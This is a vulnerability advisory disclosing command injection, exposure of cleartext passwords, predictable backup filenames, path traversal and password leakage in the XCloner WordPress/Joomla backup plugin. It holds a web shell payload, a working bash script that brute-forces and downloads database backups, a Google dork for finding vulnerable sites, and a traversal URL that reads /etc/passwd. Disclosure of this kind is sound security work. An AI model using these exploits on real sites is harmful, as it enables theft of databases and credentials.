1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271 | Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities
Author: Larry W. Cashdollar, @_larry0
Date: 10/17/2014
Download: https://wordpress.org/plugins/xcloner-backup-and-restore/
Download: http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665
Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175
Website: http://www.xcloner.com
Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other response.
CVEID: Requested, TDB.
OSVDBID:114176,114177,114178,114179,114180
Description: “XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.”
Vulnerabilities: There are multiple vulnerabilities I’ve discovered in this plugin, they are as follows.
1. Arbitrary command execution.
2. Clear text MySQL password exposure through html text box under configuration panel.
3. Database backups exposed to local users due to open file permissions.
4. Unauthenticated remote access to backup files via easily guessable file names.
5. Authenticated remote file access.
6. MySQL password exposed to process table.
Arbitrary Command Execution
Plugin allows arbitrary commands to be executed by an authenticated user. The user will require administrative access rights to backup the database. User input when specifying your own file name is not sanitized as well as various other input fields.
PoC
All input fields I believe are vulnerable, I’ve chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writeable directory by www-data.
Screenshots available at the advisory URL above.
All user configurable variables are vulnerable, these variables need to be sanitized before being passed to the exec() function for execution.
$_CONFIG[tarpath]
$exclude
$_CONFIG['tarcompress']
$_CONFIG['filename']
$_CONFIG['exfile_tar']
$_CONFIG[sqldump]
$_CONFIG['mysql_host']
$_CONFIG['mysql_pass']
$_CONFIG['mysql_user']
$database_name
$sqlfile
$filename
Vulnerable code
./cloner.functions.php:
1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . "vf $filename ./administrator/backups/index.html");
1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/database-sql.sql");
1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/htaccess.txt");
1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/perm.txt");
1695- if ($_REQUEST[cron_dbonly] != 1) {
1696: exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . $_CONFIG['exfile_tar'] . " -chv" . $_CONFIG['tarcompress'] . "f $filename ./");
1697- } else {
1698-
1699-
1700: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "cvf $filename ./administrator/backups/database-sql.sql");
1701-
1702- if (is_array($databases_incl)) {
1703- foreach ($databases_incl as $database_name)
1704- if ($database_name != "") {
1705: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/" . $database_name . "-sql.sql");
1706- }
1707- }
1708- }
--
1873- {
1874- //$sizeInBytes = filesize($path);
1875- $sizeInBytes = sprintf("%u", filesize($path));
1876: if ((!$sizeInBytes) and (function_exists("exec"))){
1877- $command = "ls -l \"$path\" | cut -d \" \" -f 5";
1878: $sizeInBytes = @exec($command);
1879- }
2010- if ($_CONFIG['sql_mem']) {
2011: exec($_CONFIG[sqldump] . " -h " . $_CONFIG['mysql_host'] . " -u " . $_CONFIG['mysql_user'] . " -p" . $_CONFIG['mysql_pass'] . " " . $dbname . " > " . $sqlfile . " $drop --allow-k
eywords " . $ex_dump);
2012-
2013- if (get_filesize($sqlfile) > 0)
2014- $databaseResult = LM_DATABASE_BACKUP_COMPLETED . ' ( ' . getFileSizeText(get_filesize($sqlfile)) . ' )';
2015- else
2016- $databaseResult = LM_MSG_BACK_14;
2017-
2018: exec("chmod 777 $sqlfile");
2019-
2020- return $sqlfile;
2021- }
./classes/fileRecursion.php
339- public static function getFileSize($file){
340-
341- $sizeInBytes = sprintf("%u", filesize($file));
342: if ((!$sizeInBytes) and (function_exists("exec"))){
343- $command = "ls -l \"$file\" | cut -d \" \" -f 5";
344: $sizeInBytes = @exec($command);
345- }
346-
347- return $sizeInBytes;
./restore/XCloner.php
290- }else{
291- if($ext == '.tgz') $compress = 'z';
292- else $compress = '';
293: shell_exec("tar -x".$compress."pf $file -C $_CONFIG[output_path]");
294- }
295-}
1077- if($_REQUEST['use_mysqldump'] == 1){
1078: echo shell_exec($_REQUEST['mysqldump_path']." -u ".$_REQUEST[mysql_username]." -p".$_REQUEST[mysql_pass]." -h ".$_REQUEST[mysql_server]." ".$_REQUEST[mysql_db]." < ".$sqlfile);
1079- return;
1080- }
Clear Text MySQL Database Password
The plugin also returns the MySQL clear text password via html text box back to the user in the configuration panel. A password should never be repeated back to you in clear text. The plugin will happily send this over a clear text connection.
Screenshots available at the advisory URL above.
Remote Database Download & Local File Permissions
The default recommend path for backup storage is /usr/share/wordpress/administrator/backups.
An index.html file is created under this directory to prevent casual browsing however the file names are easily predictable. From the installation instructions:
“XCloner is a tool that will help you manage your website backups, generate/restore/move so your website will be always secured! With XCloner you will be able to clone your site to any other location with just a few clicks. Don't forget to create the 'administrator/backups' directory in your Wordpress root and make it fully writeable.”
The format of the filenames are: backup_year-month-day_month_24hour_minute_domainname-sql-OPTIONS.tar where
OPTIONS could be either -sql-drop, -sql-nodrop or -nosql depending on options selected during time of backup.
The domain name is set by the HTTP_HOST header from line 88 of cloner.config.php:
88: $_CONFIG['mosConfig_live_site']=$_SERVER['HTTP_HOST'];
root@larry:/usr/share/wordpress/administrator/backups# ls -l
total 129432
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:15 backup_2014-10-29_10-14_testsite-sql-nodrop.tar
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:19 backup_2014-10-29_10-19_testsite-sql-nodrop.tar
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:24 backup_2014-10-29_10-24_testsite-sql-nodrop.tar
These file permissions also expose the contents of the databases to any local system users.
File naming convention code is as follows:
1327 $domainname = $_CONFIG['mosConfig_live_site'];
1351 if ($_REQUEST['bname'] == "") {
1352 if ($backupDatabase == 1) {
1353 if ($_REQUEST['dbbackup_drop']) {
1354 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-drop' . $f_ext;
1355 } else {
1356
1357 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-nodrop' . $f_ext;
1358 }
1359 } else
1360 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-nosql' . $f_ext;
1361 } else {
Screenshots available at the advisory URL above.
I’ve found a few vulnerable websites with the google dork:
https://www.google.com/#q=inurl:+administrator%2Fbackups
A PoC:
lwc@wordpress:~$ bash exp.sh 192.168.0.26
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:51-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 56.9M/s in 0.7s
2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640]
[+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar Found
[+] Received HTTP/1.1 200 OK
Downloading......
--2014-10-30 13:02:52-- http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar
Connecting to 192.168.0.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44400640 (42M) [application/x-tar]
Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1'
100%[========================================>] 44,400,640 64.1M/s in 0.7s
2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640]
#!/bin/bash
#Exploit to download XCloner v3.1.1 Database backups OSVDB: 114177
#Larry W. Cashdollar, @_larry0
#XCloner recommends a backup storage path under the WP root directory
#it uses a 0 size index.html file to block indexing.
#we can try to brute force the filenames it creates.
MONTH=10
DAY=30
#May need to set the DOMAIN to $1 the target depending on how WP is configured.
DOMAIN=
for y in `seq -w 1 24`; do
for x in `seq -w 1 59`; do
CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
wget $CPATH
fi;
done
done
Remote File Access
The user has to have administrative rights, but the backup downloader doesn’t check the path
for ../.
http://192.168.0.33/wp-admin/admin-ajax.php?action=json_return&page=xcloner_show&option=com_cloner&task=download&file=../../../../etc/passwd
Will download /etc/passwd off the remote system.
MySQL Database Password Exposed to Process Table
Local users can steal the MySQL password by watching the process table:
lwc@wordpress:/etc/wordpress$ while (true); do ps -ef |grep [m]ysqldump; done
www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -pPASSWORDHERE wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -ps3cur1ty wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords
www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords
^C
|